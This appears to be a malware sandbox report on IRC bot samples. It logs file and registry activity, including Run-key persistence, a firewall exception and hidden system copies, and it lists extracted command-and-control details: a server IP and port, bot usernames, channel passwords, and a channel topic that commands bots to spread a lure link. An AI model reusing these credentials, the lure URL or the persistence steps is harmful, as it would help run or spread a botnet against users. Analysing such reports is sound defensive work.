Open File: C:\WINDOWS\mstwain32.exe (OPEN_EXISTING)
Set File Time: C:\WINDOWS\mstwain32.exe
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\mstwain32.exe:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\mstwain32.exe
Create/Open File: C:\WINDOWS\mstwain32.exe (OPEN_ALWAYS)
Find File: C:\WINDOWS\mstwain32.exe
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\WBEM\Logs\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Create File: C:\WINDOWS\ntdtcstp.dll
Create File: C:\WINDOWS\cmsetac.dll
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)

deli.byinter.net (Turkish lamers)

deli.byinter.net 93.190.138.202

* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: ryatoaj
* Nickname: [DEU|XP|516568]
* Channel: #!x!# (Password: cih4n1313)
* Channeltopic: :

* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: XP-4392
* Nickname: [00|DEU|636610]
* Channel: #x# (Password: hacimackackac)
* Channeltopic: :.msn.stop|.msn.msg şu resme bi bakarmısın (yemekteyim) http://www.facebookbul.co.cc/images.php?=resim166-jpeg?=


* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: aLeyna_yarak-istiyor
* Nickname: sevgi
* Channel: #X (Password: s1k1k)
* Channeltopic: :FFF





Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\IMBOT.EXE" = C:\WINDOWS\IMBOT.EXE:*:Enabled:Windows Services
Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
Enums HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy


File Changes by all processes
New Files c:\images000123jpg.exe
C:\WINDOWS\CIMBOT.EXE
C:\WINDOWS\IMBOT.EXE
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
C:\WINDOWS\WINRAR2.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
\Device\RasAcd
Opened Files C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\system32\de-DE\wshom.ocx.mui
C:\WINDOWS\system32\wshom.ocx
C:\WINDOWS\system32\stdole2.tlb
C:\WINDOWS\CIMBOT.EXE
\\.\PIPE\wkssvc
\\.\PIPE\lsarpc
C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\IMBOT.EXE.config
C:\WINDOWS\IMBOT.EXE
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\WINRAR2.exe.config
C:\WINDOWS\WINRAR2.exe
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\WINRAR2.exe
Deleted Files C:\WINDOWS\CIMBOT.EXE
Chronological Order Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\de-DE\wshom.ocx.mui (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wshom.ocx (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\stdole2.tlb (OPEN_EXISTING)
Create/Open File: c:\images000123jpg.exe (OPEN_ALWAYS)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create File: C:\WINDOWS\CIMBOT.EXE
Open File: C:\WINDOWS\CIMBOT.EXE (OPEN_EXISTING)
Create File: C:\WINDOWS\IMBOT.EXE
Delete File: C:\WINDOWS\CIMBOT.EXE
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\IMBOT.EXE Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\IMBOT.EXE:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\IMBOT.EXE
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\IMBOT.EXE.config (OPEN_EXISTING)
Open File: C:\WINDOWS\IMBOT.EXE (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (SECURITY_ANONYMOUS)
Copy File: C:\WINDOWS\IMBOT.EXE to C:\WINDOWS\WINRAR2.exe
Set File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\WINRAR2.exe
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\WINRAR2.exe.config (OPEN_EXISTING)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)